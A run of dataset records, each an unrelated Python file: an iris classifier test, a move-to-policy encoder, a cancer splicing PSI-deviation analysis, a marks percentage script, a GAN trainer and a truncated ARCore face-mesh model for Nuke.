print(StackReverse().reverseStack(A,3))\n\n","sub_path":"data_structure_and_algorithms/stack_and_queue/exer3.py","file_name":"exer3.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"585322768","text":"import NeuralNet as classifier\nimport csv\nimport random\ndata = []\nwith open('irisData.csv', newline='') as f:\n    reader = csv.reader(f)\n    next(reader)\n    for row in reader:\n        curr = row.pop(4)\n        temp = []\n        if curr == 'setosa':\n            temp.append(0)\n            temp.extend([float(i) for i in row])\n            data.append(temp)\n        elif curr == 'versicolor':\n            temp.append(1)\n            temp.extend([float(i) for i in row])\n            data.append(temp)\nrandom.shuffle(data)\nfinalTest = data.pop()\n(weights,theta,epsilon) = classifier.train(data)\nprint(\"Testing training data:\")\nfor i in range(len(data)):\n    sum = 0\n    for j in range(len(weights)):\n        sum += weights[j]*data[i][j]\n    if sum > (theta - epsilon):\n        print(\"We compute 1, actually: \"+str(data[i][0]))\n    else:\n        print(\"We compute 0, actually: \"+str(data[i][0]))\nprint(\"Testing never seen data:\")\nsum = 0\nfor j in range(len(weights)):\n    sum += weights[j]*finalTest[j]\nif sum > (theta - epsilon):\n    print(\"We compute 1, actually: \"+str(finalTest[0]))\nelse:\n    print(\"We compute 0, actually: \"+str(finalTest[0]))\n\n\n    ","sub_path":"NeuralNetCall.py","file_name":"NeuralNetCall.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"106710111","text":"import re\nimport numpy as np\n\ndef plantopolicy(mov):\n\tx = ['r','g','b','y','p','o']\n\ty = ['r','g','b','y','p','o','table','outoftable']\n\txycomb = []\n\tfor i in x:\n\t\tfor j in y:\n\t\t\tif i!=j:\n\t\t\t\txycomb.append(\"move(\"+i+\",\"+j+\")\")\n\n\tmovelist = re.findall(r'move\\([^()]*\\)', mov)\n\tplist = []\n\n\tfor i in movelist :\n\t\tind = 0\n\t\tp = list(np.zeros(42, dtype=int))\n\t\tfor j in range(0,len(xycomb)):\n\t\t\tif xycomb[j]==i:\n\t\t\t\tind = j\n\t\tp[ind]=1\n\t\tplist.append(p)\n\n\treturn plist\n\npl= []\npl = plantopolicy(\"move(r,table)\")\nprint(pl)\n\n'''\nmove(x,y)\nx - r/g/b/y/p/o \ny - r/g/b/y/p/o/table/outoftable \nif x!=y\n6*8-6 \n'''","sub_path":"Misc/movedecompose_plan2policy.py","file_name":"movedecompose_plan2policy.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"525667970","text":"import sys\nimport scipy as sp\nimport scipy.stats as spst\nimport h5py\nimport os\nimport re\nimport pickle\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.markers as markers\nfrom sklearn.decomposition import PCA\n\nCONF = 2\n\nsys.path.append('..')\nfrom paths import BASEDIR,BASEDIR_AS\n\nbasedir = os.path.join(BASEDIR_AS, 'alternative_splicing')\nmetatable = os.path.join(BASEDIR, 'ICGC/orig_data/metadata/per_aliquot_v2/rnaseq_metadata.histo.tsv')\nplotdir = os.path.join(basedir, 'plots', 'psi_deviation_histo')\nif not os.path.exists(plotdir):\n    os.makedirs(plotdir)\n\n### settings\n# min PSI deviation threshold\npsi_thresh = 4\n# do we compute the deviation from the PSI mean over all samples\n# or relative to the mean of the individual subtypes?\nper_subtype = True\n# subset events to a set of functionally interesting ones\nfunctional_only = True\nfunctional_tag = 
'_func'\n\nevent_short_dict = {'exon_skip':'es', \n 'intron_retention':'ir',\n 'alt_3prime':'a3',\n 'alt_5prime':'a5',\n 'mult_exon_skip':'ms',\n 'mutex_exons':'mx'}\n\nif len(sys.argv) < 2:\n print('Usage: %s ' % sys.argv[0], file=sys.stderr)\n sys.exit(1)\nevent_type = sys.argv[1]\n\n### prep metadata\nmetadata = []\nfor line in open(metatable, 'r'):\n sl = line.strip().split('\\t')\n metadata.append(sl)\nmetadata = sp.array(metadata, dtype='str')\nheader = metadata[0, :]\nmetadata = metadata[1:, :]\naidx = sp.where(header == 'analysis_id')[0]\nalidx = sp.where(header == 'aliquot_id')[0]\ntidx = sp.where(header == 'is_tumour')[0]\npidx = sp.where(header == 'project_code')[0]\nhidx = sp.where(header == 'histotype')[0]\n\nhdf5_countfile = os.path.join(basedir, 'merge_graphs_%s_C%i.counts.hdf5' % (event_type, CONF))\nhdf5_psifile = os.path.join(basedir, 'merge_graphs_%s_C%i.counts.psi_conf.hdf5' % (event_type, CONF))\nfunc_idx_file = os.path.join(basedir, 'merge_graphs_%s_C%i.function_idx.cpickle' % (event_type, CONF))\n\nIN = h5py.File(hdf5_countfile, 'r')\n\n### get relevant index vectors\ncidx = IN['conf_idx'][:].astype('int')\ngidx = IN['gene_idx'][:][cidx].astype('int')\nstrains = sp.array([x.split('.')[0] for x in IN['strains'][:]], dtype='str')\nevent_idx = cidx + 1\n\n### load psi of confident events\nif os.path.exists(hdf5_psifile):\n print('loading %i confident events from %s' % (cidx.shape[0], hdf5_psifile), file=sys.stderr)\n IN2 = h5py.File(hdf5_psifile, 'r')\n psi = IN2['psi'][:]\n IN2.close()\nelse:\n print('loading %i confident events from %s' % (cidx.shape[0], hdf5_countfile), file=sys.stderr)\n psi = sp.empty((IN['psi'].shape[0], cidx.shape[0]), dtype='float')\n for i in range(psi.shape[0]):\n if i > 0 and i % 10 == 0:\n sys.stderr.write('.')\n if i % 100 == 0:\n sys.stderr.write('%i/%i strains done\\n' % (i, psi.shape[0]))\n tmp = IN['psi'][i, :]\n psi[i, :] = tmp[cidx]\n OUT = h5py.File(hdf5_psifile, 'w')\n OUT.create_dataset(name='psi', data=psi, compression='gzip')\n OUT.close()\nprint('\\n...done', file=sys.stderr)\n\n### sort metadata by strains and subset psi values to \n### donors present in metadata\na, b = sp.where(strains[:, sp.newaxis] == metadata[:, aidx[0]])\nassert sp.all(strains[a] == metadata[:, aidx[0]][b]) \nstrains = strains[a]\npsi = psi[a, :]\nmetadata = metadata[b, :]\n\n### remove normals from analysis\nis_tumor = sp.where(metadata[:, tidx[0]] == 'yes')[0]\nstrains = strains[is_tumor]\npsi = psi[is_tumor, :]\nmetadata = metadata[is_tumor, :]\n\n### filter for functional events only\nif functional_only:\n print('filtering for functional events', file=sys.stderr)\n cidx_filt = pickle.load(open(func_idx_file, 'r'))\n k_idx = sp.where(sp.in1d(cidx, cidx_filt))[0]\n psi = psi[:, k_idx]\n gidx = gidx[k_idx]\n cidx = cidx[k_idx]\n event_idx = event_idx[k_idx]\n print('retaining %s events' % k_idx.shape[0], file=sys.stderr)\n\n### filter even more strictly\nprint('filtering for missing data', file=sys.stderr)\nkeep_mat = None\nif per_subtype:\n #proj_idx = sp.where(header == 'histotype')[0][0]\n #projects = sp.unique(metadata[:, proj_idx])\n projects = sp.unique([':'.join([metadata[i, pidx[0]], metadata[i, hidx[0]]]) for i in range(metadata.shape[0])])\n keep_mat = sp.zeros((projects.shape[0], psi.shape[1]), dtype='bool')\n for p, project in enumerate(projects):\n print('processing subtype %s (%i/%i)' % (project, p + 1, projects.shape[0]))\n curr_idx = sp.where((metadata[:, pidx[0]] == project.split(':')[0]) & (metadata[:, hidx[0]] == 
project.split(':')[1]))[0]\n nan_frac = sp.mean(sp.isnan(psi[curr_idx, :]).astype('float'), axis=0)\n kidx = sp.where(nan_frac < 0.3)[0]\n keep_mat[p, kidx] = True\n kidx = keep_mat.max(axis=0)\nelse:\n #kidx = sp.where(sp.sum(sp.isnan(psi), axis=0) < (0.3 * psi.shape[0]))[0]\n kidx = sp.where(sp.mean(sp.isnan(psi).astype('float'), axis=0) < 0.3)[0]\n\npsi = psi[:, kidx]\ngidx = gidx[kidx]\ncidx = cidx[kidx]\nevent_idx = event_idx[kidx]\nif keep_mat is not None: \n keep_mat = keep_mat[:, kidx]\nprint('%i events remain after filtering' % sp.sum(kidx), file=sys.stderr)\nprint('affecting %i genes' % sp.unique(gidx).shape[0], file=sys.stderr)\nprint('...done', file=sys.stderr)\n\n### get dev from mean per subtype\nif per_subtype:\n ### generate PSI distribution plots\n p_num = projects.shape[0]\n panels = sp.ceil(sp.sqrt(p_num)).astype('int')\n gs = gridspec.GridSpec(panels, panels)\n fig = plt.figure(figsize=(4*panels, 4*panels), dpi=200) \n\n for p, project in enumerate(projects):\n print('computing mean for subtype %s (%i/%i)' % (project, p + 1, projects.shape[0]))\n ### operate on a part of the matrix\n #curr_idx = sp.where(metadata[:, proj_idx] == project)[0]\n curr_idx = sp.where((metadata[:, pidx[0]] == project.split(':')[0]) & (metadata[:, hidx[0]] == project.split(':')[1]))[0]\n kidx = sp.where(keep_mat[p, :])[0]\n kidxn = sp.where(~keep_mat[p, :])[0] \n psi_mean = spst.nanmean(psi[curr_idx, :][:, kidx], axis=0)\n psi_stddev = spst.nanstd(psi[curr_idx, :][:, kidx], axis=0)\n for cc in curr_idx:\n psi[cc, kidx] = psi[cc, kidx] - psi_mean\n psi[cc, kidx] /= psi_stddev\n kkidx = sp.where(psi_stddev < 0.01)[0]\n psi[cc, kidx[kkidx]] = 0\n psi[cc, kidxn] = 0\n\n ax = fig.add_subplot(gs[p // panels, p % panels])\n print('plotting distribution for %s' % project)\n #ax.hexbin(psi[curr_idx, :][:, kidx].ravel(), sp.dot(sp.arange(min(curr_idx.shape[0], 100))[:, sp.newaxis], sp.ones((1, kidx.shape[0]))).ravel(), gridsize=(100, min(curr_idx.shape[0], 100)))\n #ax.hexbin(psi[curr_idx, :][:, kidx].ravel(), sp.dot(sp.arange(min(curr_idx.shape[0], 100))[:, sp.newaxis], sp.ones((1, kidx.shape[0]))).ravel(), gridsize=(10, min(curr_idx.shape[0], 100)), mincnt=1, bins='log')\n plt_mat = []\n # bounds = sp.array([ 0.01, 0.25, 0.5 , 0.75, 1. , 1.25, 1.5 , 1.75, 2. ,\n # 2.25, 2.5 , 2.75, 3. , 3.25, 3.5 , 3.75, 4. , 4.25,\n # 4.5 , 4.75, 5. 
], dtype='float')\n bounds = sp.array([ 0.01, 0.1 , 0.25, 0.5 , 1., 2., 4., 8., 16 ], dtype='float')\n\n for cc in curr_idx:\n nnidx = sp.where(~sp.isnan(psi[cc, kidx]))[0]\n bins, _ = sp.histogram(psi[cc, kidx][nnidx], bins=bounds)\n ax.plot(sp.arange(bins.shape[0]) + 0.5, bins, 'b-')\n #plt_mat.append(bins)\n #plt_mat = sp.array(plt_mat)\n #ax.imshow(sp.sqrt(plt_mat), aspect='auto', interpolation='none')\n #prct95 = spst.scoreatpercentile(psi[curr_idx, :][:, kidx].ravel(), 95)\n #ylim = ax.get_ylim()\n #xlim = ax.get_xlim()\n #ax.plot([prct95, prct95], ylim, '--r', linewidth=2)\n #ax.set_ylim(ylim)\n #ax.set_xlim(xlim)\n ax.set_title(project + ' (N=%i)' % curr_idx.shape[0])\n ax.set_xticks(sp.arange(bounds.shape[0]))\n ax.set_xticklabels(bounds, rotation=90)\n #ax.set_xticks(sp.arange(20)[::2] + 0.5)\n #ax.set_xticklabels(bounds[::2][:-1] + 0.25, rotation=90)\n ax.set_xlabel('PSI deviation')\n ax.set_ylabel('Frequency')\n\n plt.tight_layout()\n plt.savefig(os.path.join(plotdir, 'normalized_psi_distribution_noabs_histo_%s%s.png' % (event_type, functional_tag)), format='png', bbox_inches='tight')\n plt.close(fig)\n \n\n### get dev from mean over all samples\nelse:\n psi_mean = spst.nanmean(psi, axis=0)\n psi_stddev = spst.nanstd(psi, axis=0)\n psi = psi - sp.tile(psi_mean, (psi.shape[0], 1))\n psi /= sp.tile(psi_stddev, (psi.shape[0], 1))\n\n### substitute NaN values\npsi[sp.isnan(psi)] = 0\n\n#import pdb\n#pdb.set_trace()\n\n### compute PCA on psi table\nprint('Computing Event Level PCA')\npca = PCA(n_components=2)\ntrans_data = pca.fit_transform(psi)\ncmap = plt.get_cmap('jet')\nnorm = plt.Normalize(0, projects.shape[0])\nfig = plt.figure(figsize=(6, 6))\nax = fig.add_subplot(111)\nfor p, project in enumerate(projects):\n #curr_idx = sp.where(metadata[:, proj_idx] == project)[0]\n curr_idx = sp.where((metadata[:, pidx[0]] == project.split(':')[0]) & (metadata[:, hidx[0]] == project.split(':')[1]))[0]\n ax.plot(trans_data[curr_idx, 0], trans_data[curr_idx, 1], 'o', color=cmap(norm(p)), alpha=0.75, label=project, marker=markers.MarkerStyle.filled_markers[p % 13])\n ax.set_title('PCA - Event Level (%s)' % event_type)\n ax.set_xlabel('PC 1')\n ax.set_ylabel('PC 2')\nax.legend(numpoints=1, ncol=2, loc='center left', bbox_to_anchor=(1.05, 0.5), frameon=False)\n\nplt.tight_layout()\nplt.savefig(os.path.join(plotdir, 'normalized_psi_pca_histo_noabs_%s%s.png' % (event_type, functional_tag)), format='png', bbox_inches='tight')\nplt.close(fig)\n\n### collapse per gene\n### - if there are multiple events per gene, take event with max\n### PSI to represent the full gene\ngsidx = sp.argsort(gidx)\ngidx = gidx[gsidx]\ngidx,fidx = sp.unique(gidx, return_index=True)\nlidx = sp.r_[fidx[1:], gsidx.shape[0]]\ngene_names = IN['gene_names'][:][gidx]\n\npsi_collapsed = sp.empty((psi.shape[0], fidx.shape[0]), dtype='float')\nevent_idx_collapsed = sp.empty((psi.shape[0], fidx.shape[0]), dtype='int')\nfor i in range(lidx.shape[0]):\n tmp = sp.absolute(psi[:, gsidx[fidx[i]:lidx[i]]]).argmax(axis=1)\n event_idx_collapsed[:, i] = event_idx[gsidx[fidx[i]:lidx[i]]][tmp]\n psi_collapsed[:, i] = sp.array([psi[:, gsidx[fidx[i]:lidx[i]]][ii, jj] for ii, jj in enumerate(tmp)])\n\n### gene centric PCA\nprint('Computing Gene Level PCA')\npca = PCA(n_components=2)\ntrans_data = pca.fit_transform(psi_collapsed)\ncmap = plt.get_cmap('jet')\nnorm = plt.Normalize(0, projects.shape[0])\nfig = plt.figure(figsize=(6, 6))\nax = fig.add_subplot(111)\nfor p, project in enumerate(projects):\n #curr_idx = sp.where(metadata[:, proj_idx] == 
project)[0]\n curr_idx = sp.where((metadata[:, pidx[0]] == project.split(':')[0]) & (metadata[:, hidx[0]] == project.split(':')[1]))[0]\n ax.plot(trans_data[curr_idx, 0], trans_data[curr_idx, 1], 'o', color=cmap(norm(p)), alpha=0.75, label=project, marker=markers.MarkerStyle.filled_markers[p % 13])\n ax.set_title('PCA - Gene Level (%s)' % event_type)\n ax.set_xlabel('PC 1')\n ax.set_ylabel('PC 2')\nax.legend(numpoints=1, ncol=2, loc='center left', bbox_to_anchor=(1.05, 0.5), frameon=False)\n\nplt.tight_layout()\nplt.savefig(os.path.join(plotdir, 'normalized_psi_per_gene_pca_histo_noabs_%s%s.png' % (event_type, functional_tag)), format='png', bbox_inches='tight')\nplt.close(fig)\n\npsi_collapsed = psi_collapsed.T\npsi_collapsed_bin = (sp.absolute(psi_collapsed) >= psi_thresh)\nevent_idx_collapsed = event_idx_collapsed.T.astype('str')\nfor i in range(event_idx_collapsed.shape[0]):\n for j in range(event_idx_collapsed.shape[1]):\n event_idx_collapsed[i, j] = event_short_dict[event_type] + ':' + event_idx_collapsed[i, j]\n\npsi_collapsed = psi_collapsed.astype('str')\n#psi_collapsed = sp.r_[strains[sp.newaxis, :], psi_collapsed]\npsi_collapsed = sp.r_[metadata[:, alidx[0]][sp.newaxis, :], psi_collapsed]\npsi_collapsed = sp.c_[sp.hstack(['gene_id', gene_names]), psi_collapsed]\noutfname = os.path.join(basedir, 'merge_graphs_%s_C%i.psi_dev_histo_noabs_per_gene%s.tsv.gz' % (event_type, CONF, functional_tag))\nif not os.path.exists(outfname):\n sp.savetxt(outfname, psi_collapsed, fmt='%s', delimiter='\\t')\n\nevent_idx_collapsed = sp.r_[metadata[:, alidx[0]][sp.newaxis, :], event_idx_collapsed]\nevent_idx_collapsed = sp.c_[sp.hstack(['gene_id', gene_names]), event_idx_collapsed]\noutfname = os.path.join(basedir, 'merge_graphs_%s_C%i.psi_dev_histo_noabs_per_gene%s.event_ids.tsv.gz' % (event_type, CONF, functional_tag))\nif not os.path.exists(outfname):\n print('writing ' + outfname)\n sp.savetxt(outfname, event_idx_collapsed, fmt='%s', delimiter='\\t')\n\nkidx = sp.where(sp.sum(psi_collapsed_bin, axis=1) > 0)[0] \npsi_collapsed_bin = psi_collapsed_bin[kidx, :]\ngene_names = gene_names[kidx]\n\n### how sparse is the binary matrix for the given cutoff?\nsparsity = sp.sum(psi_collapsed_bin.astype('int') != 0).astype('float') / (psi_collapsed_bin.shape[0] * psi_collapsed_bin.shape[1]) * 100\nprint('given the current threshold of %i, %.2f percent of the matrix are non-zero' % (psi_thresh, sparsity))\n\npsi_collapsed_bin = psi_collapsed_bin.astype('int').astype('str')\n#psi_collapsed_bin = sp.r_[strains[sp.newaxis, :], psi_collapsed_bin]\npsi_collapsed_bin = sp.r_[metadata[:, alidx[0]][sp.newaxis, :], psi_collapsed_bin]\npsi_collapsed_bin = sp.c_[sp.hstack(['gene_id', gene_names]), psi_collapsed_bin]\noutfname = os.path.join(basedir, 'merge_graphs_%s_C%i.psi_dev_histo_noabs_per_gene_binary%s.min%i.tsv.gz' % (event_type, CONF, functional_tag, psi_thresh))\nsp.savetxt(outfname, psi_collapsed_bin, fmt='%s', delimiter='\\t')\n\nIN.close()\n","sub_path":"gene_centric_tables/psi_deviance_noabs_histo.py","file_name":"psi_deviance_noabs_histo.py","file_ext":"py","file_size_in_byte":13927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"213227140","text":"def calPercent(obtainedMarks,maxMarks):\n '''\n objective : To calculate the percentage of the given marks \n arguments:\n obtainedMarks : the marks obtained by the student\n\t\tmaxMarks : the maximum marks possible\n approach : Using arithmetic operations\n return value : \n\t\tpercentage : The calculated 
percentage is returned\n\t\t'''\n percentage=(obtainedMarks/maxMarks)*100\n return percentage\n \ndef main():\n '''\n objective: To calculate the percentage of the given marks\n User inputs :\n obtainedMarks : The marks obtained by the student\n maxMarks : The maximum marks possible\n approach: Using function calPercent(); the computed value is stored in calPercentage\n '''\n obtainedMarks = int(input(\"Enter Marks: \"))\n maxMarks = int(input(\"Enter max Marks: \"))\n calPercentage = calPercent(obtainedMarks,maxMarks)\n print(\"Percentage: \", calPercentage)\n print(\"End of Main\")\n \nif __name__ == \"__main__\":\n main()\n print(\"End of Program\")\n","sub_path":"hw-piazza/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"613062940","text":"import torch\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torchvision.utils as vutils\r\nfrom base.base_trainer import BaseTrainer\r\nfrom loss.dloss import CriterionD\r\nfrom loss.ganloss import GANLoss\r\nfrom base.utils import make_parts_shape\r\n\r\n\r\nclass FullTrainer(BaseTrainer):\r\n def __init__(self, opt, dataloader, criterion, model, testloader):\r\n super().__init__(opt, dataloader, criterion, model.gnet)\r\n self.testloader = testloader\r\n self.dnet = model.dnet\r\n self.dnet_s = model.dnet_s\r\n self.criterion_d = CriterionD(use_lsgan=True)\r\n self.criterionGAN = GANLoss(use_lsgan=True)\r\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n def train(self):\r\n print(f'Use device: {self.device}\n'\r\n f'Network:\n'\r\n f'In channels: {self.n_channels} '\r\n f'Out channels: {self.n_classes}')\r\n self.model.to(device=self.device)\r\n self.dnet.to(device=self.device)\r\n self.dnet_s.to(device=self.device)\r\n\r\n optimizer_G = torch.optim.Adam(self.model.parameters(), lr=self.learning_rate)\r\n optimizer_D = torch.optim.Adam(self.dnet.parameters(), lr=self.learning_rate)\r\n optimizer_Ds = torch.optim.Adam(self.dnet_s.parameters(), lr=self.learning_rate)\r\n\r\n test_batch = next(iter(self.testloader))\r\n test_img = test_batch['input']['image']\r\n test_img = test_img.type(torch.FloatTensor).to(self.device)\r\n test_pose = test_batch['input']['t_pose']\r\n test_pose = test_pose.type(torch.FloatTensor).to(self.device)\r\n test_map = test_batch['input']['s_map']\r\n test_map = test_map.type(torch.FloatTensor).to(self.device)\r\n for epoch in range(self.epochs):\r\n for idx, data_batch in enumerate(self.dataloader):\r\n img = data_batch['input']['image']\r\n smap = data_batch['input']['s_map']\r\n t_pose = data_batch['input']['t_pose']\r\n target = data_batch['input']['target']\r\n t_map = data_batch['input']['t_map']\r\n img = img.type(torch.FloatTensor).to(self.device)\r\n t_pose = t_pose.type(torch.FloatTensor).to(self.device)\r\n target = target.type(torch.FloatTensor).to(self.device)\r\n smap = smap.type(torch.FloatTensor).to(self.device)\r\n t_map = t_map.type(torch.FloatTensor).to(self.device)\r\n # image discriminator\r\n self.dnet.zero_grad()\r\n real_out_d = self.dnet(target)\r\n label_d = torch.full(real_out_d.size(), 1, device=self.device)\r\n real_loss_d = self.criterion_d(real_out_d, label_d)\r\n real_loss_d.backward()\r\n\r\n fake, fake_smap = self.model(img, t_pose, smap)\r\n fake_out_d = self.dnet(fake.detach())\r\n label_d.fill_(0)\r\n fake_loss_d = self.criterion_d(fake_out_d, label_d)\r\n fake_loss_d.backward()\r\n\r\n 
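# total image-discriminator loss over the real and fake batches\r\n err_d = 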
real_loss_d + fake_loss_d\r\n optimizer_D.step()\r\n\r\n # semantic map discriminator\r\n self.dnet_s.zero_grad()\r\n real_out_d = self.dnet_s(t_map)\r\n label_d = torch.full(real_out_d.size(), 1, device=self.device)\r\n real_loss_d = self.criterion_d(real_out_d, label_d)\r\n real_loss_d.backward()\r\n\r\n fake_out_d = self.dnet_s(fake_smap.detach())\r\n label_d.fill_(0)\r\n fake_loss_d = self.criterion_d(fake_out_d, label_d)\r\n fake_loss_d.backward()\r\n\r\n err_ds = real_loss_d + fake_loss_d\r\n optimizer_Ds.step()\r\n\r\n self.model.zero_grad()\r\n fake_score_d = self.dnet(fake)\r\n fake_score_ds = self.dnet_s(fake_smap)\r\n label_d.fill_(1)\r\n l_gan1 = self.criterionGAN(fake_score_d, label_d)\r\n l_gan2 = self.criterionGAN(fake_score_ds, label_d)\r\n loss_l1, loss_p = self.criterionPerPixel(fake, target)\r\n loss_l1_s, loss_ps = self.criterionPerPixel(fake_smap, t_map)\r\n err_g = 10 * loss_l1 + 0.8 * loss_p # + 0.1 * l_gan1 + l_gan2\r\n err_g.backward()\r\n optimizer_G.step()\r\n if idx % 200 == 0:\r\n print('Epoch: {}, Iter: {}, gloss: {:.5f}, l1: {:.5f}, l1_s: {:.5f},'\r\n 'lp: {:.5f}, lps: {:.5f}, lg: {:.5f}, lg2: {:.5f}, ld: {:.5f}, lds: {:.5f}'.format(\r\n epoch, idx, err_g.item(), loss_l1.item(), loss_l1_s.item(), loss_p.item(), loss_ps.item(),\r\n l_gan1.item(), l_gan2.item(), err_d.item(), err_ds.item()))\r\n\r\n if idx % 200 == 0 or (epoch == self.epochs - 1 and idx == len(self.dataloader) - 1):\r\n torch.save(self.dnet.state_dict(), './model/d_net.pth')\r\n torch.save(self.model.state_dict(), './model/g_net.pth')\r\n with torch.no_grad():\r\n fake_, fake_map = self.model(test_img, test_pose, test_map)\r\n fake_ = fake_.detach().cpu()\r\n fake_map = fake_map.detach().cpu()\r\n target_ = (test_batch['input']['target']).detach().cpu()\r\n source = (test_batch['input']['t_map']).detach().cpu()\r\n poses = (test_batch['input']['t_pose']).detach().cpu()\r\n poses = torch.unsqueeze(torch.sum(poses, dim=1), dim=1)\r\n sample_target = vutils.make_grid(target_, padding=2, normalize=False)\r\n sample_source = vutils.make_grid(source, padding=2, normalize=False)\r\n sample_pose = vutils.make_grid(poses, padding=2, normalize=False)\r\n sample = vutils.make_grid(fake_, padding=2, normalize=False)\r\n sample_map = vutils.make_grid(fake_map, padding=2, normalize=False)\r\n plt.figure(figsize=(32, 16))\r\n plt.axis('off')\r\n plt.title('fake image')\r\n plt.subplot(5, 1, 1)\r\n plt.imshow(np.transpose(sample_source, (1, 2, 0)))\r\n plt.subplot(5, 1, 2)\r\n plt.imshow(np.transpose(sample_pose, (1, 2, 0)))\r\n plt.subplot(5, 1, 3)\r\n plt.imshow(np.transpose(sample, (1, 2, 0)))\r\n plt.subplot(5, 1, 4)\r\n plt.imshow(np.transpose(sample_target, (1, 2, 0)))\r\n plt.subplot(5, 1, 5)\r\n plt.imshow(np.transpose(sample_map, (1, 2, 0)))\r\n plt.savefig(\"./sample/epoch_{}_iter_{}.png\".format(epoch, idx))\r\n plt.close()\r\n\r\n","sub_path":"FullTrainer.py","file_name":"FullTrainer.py","file_ext":"py","file_size_in_byte":6891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"7513907","text":"# Copyright (c) 2019 Alexander Mishurov.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF 
ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##############################################################################\n\nimport os\n\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom skimage.transform import estimate_transform, warp\nimport message_pb2\n\nfrom ..baseModel import BaseModel\n\n\nDATA_PATH = './models/arcore/data'\n\nFACEMESH_MODEL_PATH = os.path.join(\n DATA_PATH, 'facemesh-lite_nocrawl-2019_01_14-v0.tflite')\n\nDETECTOR_MODEL_PATH = os.path.join(DATA_PATH, 'opencv_face_detector_uint8.pb')\n\nDETECTOR_CONFIG_PATH = os.path.join(DATA_PATH, 'opencv_face_detector.pbtxt')\n\nFACEMESH_OBJ_PATH = os.path.join(DATA_PATH, 'canonical_face_mesh.obj')\n\n\ndef read_obj(path):\n v_values = []\n vt_values = []\n vn_values = []\n f_indices = []\n\n def parse_values(line):\n return [float(v) for v in line.split()[1:]]\n\n def parse_indices(line):\n return [[int(i) - 1 for i in t.split(\"/\")] for t in line.split()[1:]]\n\n # Map .obj lines to parsing functions\n parse_map = {\n \"v \": [v_values, parse_values],\n \"vt\": [vt_values, parse_values],\n \"vn\": [vn_values, parse_values],\n \"f \": [f_indices, parse_indices],\n }\n\n def parse_line(l):\n attr = l[:2]\n if attr in parse_map.keys():\n p = parse_map[attr]\n p[0].append(p[1](l))\n\n with open(path) as obj:\n [parse_line(l) for l in obj.readlines()]\n\n # Construct flat arrays of face indices and face corners' attributes\n uvs = []\n normals = []\n faces = []\n for f in f_indices:\n for indices in f:\n faces.append(indices[0])\n uv = vt_values[indices[1]][:]\n # Add 0 and 1 to every uv for Nuke\n uv.extend([0., 1.])\n uvs.extend(uv)\n norm = vn_values[indices[2]][:]\n # Invert normal's z for Nuke\n norm[2] *= -1\n normals.extend(norm)\n\n return faces, uvs, normals\n\n\nclass Model(BaseModel):\n def __init__(self):\n super(Model, self).__init__()\n self.name = 'Google ARCore'\n\n # Define options\n self.detect_face = True\n self.options = ('detect_face',)\n\n # Define inputs/outputs\n self.inputs = {'input': 3}\n self.outputs = {'output': 3}\n\n # Configure face detector and mesh models\n self.interpreter = tf.lite.Interpreter(model_path=FACEMESH_MODEL_PATH)\n self.interpreter.allocate_tensors()\n self.detector = cv2.dnn.readNetFromTensorflow(\n DETECTOR_MODEL_PATH, DETECTOR_CONFIG_PATH)\n\n input_details = self.interpreter.get_input_details()\n self.input_shape = input_details[0]['shape']\n self.input_index = input_details[0]['index']\n output_details = self.interpreter.get_output_details()\n self.output_index = output_details[0]['index']\n\n # Define 3 points of the input for similarity transformation\n self.dst_points = np.array([\n [0, 0], [0, self.input_shape[1] - 1], [self.input_shape[2] - 1, 0]\n ])\n\n # Load canonical face geometry data\n self.faces, self.uvs, self.normals = read_obj(FACEMESH_OBJ_PATH)\n\n def vprint(self, msg):\n print(\"{} -> {}\".format(self.name, msg))\n\n def inference(self, image_list):\n image = image_list[0]\n image_fp32 = self.linear_to_srgb(image)\n image = (image_fp32 * 255).astype(np.uint8)\n\n h, w = image.shape[:2]\n box = self.predict_face_box(image) if self.detect_face else (0, 0, w, h)\n if box is None:\n # It would be nice to send error messages to a client\n script = \"nuke.error('No faces found')\\n\"\n script_msg = message_pb2.FieldValuePairAttrib()\n script_msg.name = \"PythonScript\"\n script_msg_val = script_msg.values.add()\n 
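# the error script is returned to the client as a nested string attribute\n script_msg_str = 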
script_msg_val.string_attributes.add()\n script_msg_str.values.extend([script])\n return [script_msg]\n\n # Draw rectangle around detected face\n (x, y, r, b) = box\n cv2.rectangle(image, (x, y), (r, b), (0, 255, 0), 2)\n\n # Predict points of the detected face\n positions = self.predict_face_points(image, box)\n\n # Create protobuf object\n geo = message_pb2.FieldValuePairAttrib()\n geo.name = \"Geo\"\n geo_val = geo.values.add()\n\n points = geo_val.float_attributes.add()\n points.name = \"points\"\n points.values.extend(positions)\n\n attrs_map = {\n \"indices\": [\"int_attributes\", self.faces],\n \"uv Group_Vertices\": [\"float_attributes\", self.uvs],\n \"N Group_Vertices\": [\"float_attributes\", self.normals],\n }\n\n for k, v in attrs_map.items():\n attr = getattr(geo_val, v[0]).add()\n attr.name = k\n attr.values.extend(v[1])\n\n # Convert the image for Nuke and return it with the geometry so the model\n # can work in both the image processing and 3d nodes\n image = image.astype(np.float32) / 255.\n image = self.srgb_to_linear(image)\n return [image, geo]\n\n def predict_face_box(self, image):\n self.vprint(\"Predicting face bounding box...\")\n\n h, w = image.shape[:2]\n # Create an input tensor for face detection\n 